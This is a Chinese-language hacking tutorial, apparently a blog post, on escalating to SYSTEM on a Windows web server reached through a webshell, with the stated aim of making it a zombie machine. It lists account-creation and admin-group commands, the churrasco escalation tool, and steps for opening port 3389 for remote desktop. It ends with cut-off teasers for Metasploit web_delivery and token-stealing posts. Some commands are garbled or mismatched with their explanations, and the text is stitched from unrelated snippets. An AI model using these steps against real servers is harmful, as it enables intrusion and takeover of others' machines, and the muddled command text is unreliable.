提到system許可權 甚至讓他變成你的肉雞
我們了解一下windows下面有那些使用者
guests是使用者最低的許可權 而且一般是被禁用的
user許可權也很低
連關機都不行
還有window系統內建使用者組
只對本站的主目錄有讀寫修改的許可權
net user 顯示你當前系統有那些使用者賬號
net user administrator是顯示當前使用者的詳細資訊
net user guest 從來沒有登入 過 未啟用 屬於guests組的成員
net user 123456 /add (更改hacker的密碼為123456)
net user hacker /del 將hacker使用者刪除
啟用賬號 或者禁用賬號
net user guest /active:yes (啟用賬號)
禁用的話將active:no
net localgroup 顯示當前系統裡面所有的組
net localgroup administrator 後面加的是乙個組的名稱 檢視administrator組有哪些成員
將hacker新增到管理員組
net localgroup administrator hacker /del
將hacker從管理員組中刪除
1 whoami 檢視我是誰
這裡看到是管理員
但是在菜刀連線的裡面
拒絕訪問
此時我們怎麼辦吶
方法一上傳乙個cmd.exe
這是自己的cmd
此時我們再次嘗試新增使用者
很遺憾失敗了
這時我們要用到提權軟體了
上傳提權軟體
切換到軟體路徑
然後利用工具的語法
進行提權
churrasco 「命令」
接下來我們看他3389埠開放沒有
netstat –an 檢視埠開放情況
如果沒開怎麼辦
同樣利用工具
兩個工具同時使用
3389.bat 3389.vs
埠都開啟了
mstsc 遠端桌面
連線成功
內網的Windows提權基礎
msf提權 因為uac,直接使用這個可能會失敗 漏洞提權 cs提權 一些命令是有system許可權的 用at開啟system許可權的msf msf use exploit multi script web delivery 完成設定並執行 給出一條語句 將其在cmd下用at執行.例如 at 11 2...
Windows令牌竊取提權
令牌 token 是系統的臨時秘鑰,相當於賬號和密碼,用來決定是否允許這次請求和判斷這次請求是屬於哪乙個使用者的。它允許你在不提供密碼或其他憑證的前提下,訪問網路和系統資源,這些令牌將持續存在於系統中,除非系統重新啟動。令牌最大的特點就是隨機性,不可 黑客或軟體無法猜測出令牌。假冒令牌可以假冒乙個網...
windows另類執行exp提權
這個是在提權某國外伺服器時候發現的,該伺服器的環境是win2k3 iis6.0。烤肉,pr,iis6的漏洞補丁都沒有打,但是,可寫很少。上傳了啊d牛的指令碼後找到可寫目錄了。可寫目錄 c program files zend zendoptimizer 3.3.0 lib 按照慣例上傳cmd.txt...